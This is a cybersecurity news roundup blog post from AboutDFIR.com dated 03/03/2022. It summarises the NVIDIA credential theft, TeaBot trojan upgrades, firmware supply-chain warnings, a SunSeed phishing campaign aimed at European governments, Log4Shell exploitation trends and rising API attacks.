AboutDFIR.com – The Definitive Compendium Project
Digital Forensics & Incident Response

Blog Post

InfoSec News Nuggets 03/03/2022

NVIDIA Confirms Employee Credentials Stolen in Cyberattack

NVIDIA this week acknowledged that employee credentials were stolen during a cyberattack on February 23 and confirmed the attackers have started leaking the information online. The compromise occured on February 23 and impacted certain “IT resources,” an NVIDIA spokesperson told SecurityWeek. “Shortly after discovering the incident, we further hardened our network, engaged cybersecurity incident response experts, and notified law enforcement,” the NVIDIA spokesperson added. While the investigation into the incident continues, NVIDIA says that it hasn’t found evidence that ransomware was deployed on its network. 


TeaBot Android Banking Trojan continues its global conquest with new upgrades

The TeaBot Remote Access Trojan (RAT) has been upgraded, leading to a huge increase in both targets and spread worldwide. On March 1, the Cleafy research team said TeaBot now targets over 400 applications, pivoting from an earlier focus on “smishing” to more advanced tactics. Smishing attacks are used to compromise mobile handsets via spam text messages containing malicious links. It is often the case that these links — pretending to be from your bank, social media network, or a delivery company, for example — will lead victims to fraudulent websites that request their personal data and account credentials. 


U.S. Gov: Firmware Security is ‘Single Point of Failure’

The U.S. government, at the very highest levels, is calling attention to major weaknesses in the firmware supply chain, warning that the layer below the operating system is fertile ground for devastating hacker attacks. A new joint draft report issued by leadership of the U.S. Department of Homeland Security (DHS) and Department of Commerce said firmware presented “a large and ever-expanding attack surface” for malicious hackers to subvert the core of modern computing. “Securing the firmware layer is often overlooked, but it is a single point of failure in devices and is one of the stealthiest methods in which an attacker can compromise devices at scale.”


State Actor Uses Compromised Private Ukrainian Military Emails to Target European Governments and Refugee Movement

Proofpoint researchers have identified a phishing campaign originating from an email address (ukr[.]net) that appears to belong to a compromised Ukranian armed service member. This discovery comes on the heels of alerts by the Ukrainian Computer Emergency Response Team (CERT-UA) and the State Service of Special Communications and Information Protection of Ukraine about widespread phishing campaigns targeting private email accounts of Ukrainian armed service members by ‘UNC1151’, which Proofpoint tracks as part of TA445. The email observed by Proofpoint may represent the next stage of these attacks. The email included a malicious macro attachment which utilized social engineering themes pertaining to the Emergency Meeting of the NATO Security Council held on February 23, 2022. The email also contained a malicious attachment which attempted to download malicious Lua malware named SunSeed and targeted European government personnel tasked with managing transportation and population movement in Europe. While Proofpoint has not definitively attributed this campaign to the threat actor TA445, researchers acknowledge that the timeline, use of compromised sender addresses aligning with Ukrainian government reports, and the victimology of the campaign align with published TA445 tactics to include the targeting and collection around refugee movement in Europe. 


Log4shell exploits now used mostly for DDoS botnets, cryptominers

The Log4Shell vulnerabilities in the widely used Log4j software are still leveraged by threat actors today to deploy various malware payloads, including recruiting devices into DDoS botnets and for planting cryptominers. According to a report by Barracuda, the past couple of months were characterized by dips and spikes in the targeting of Log4Shell, but the volume of exploitation attempts has remained relatively constant. After analyzing these attacks, Barracuda determined that most exploitation attempts came from US-based IP addresses, followed by Japan, central Europe, and Russia. In December 2021, researchers found Log4j version 2.14.1 and all previous versions to be vulnerable to CVE-2021-44228, dubbed “Log4Shell,” a critical zero-day remote code execution flaw.


Attacks abusing programming APIs grew over 600% in 2021

Security analysts warn of a sharp rise in API attacks over the past year, with most companies still following inadequate practices to tackle the problem. More specifically, Salt Security reports a growth of 681% of API attack traffic in 2021, while the overall API traffic increased by 321%. These stats underline that as industries adopt API solutions, attacks against them are growing disproportionally. All data presented in Salt Security’s report was taken from a survey of a diverse demographic of 250 employees working for companies of varied sizes.

Related Posts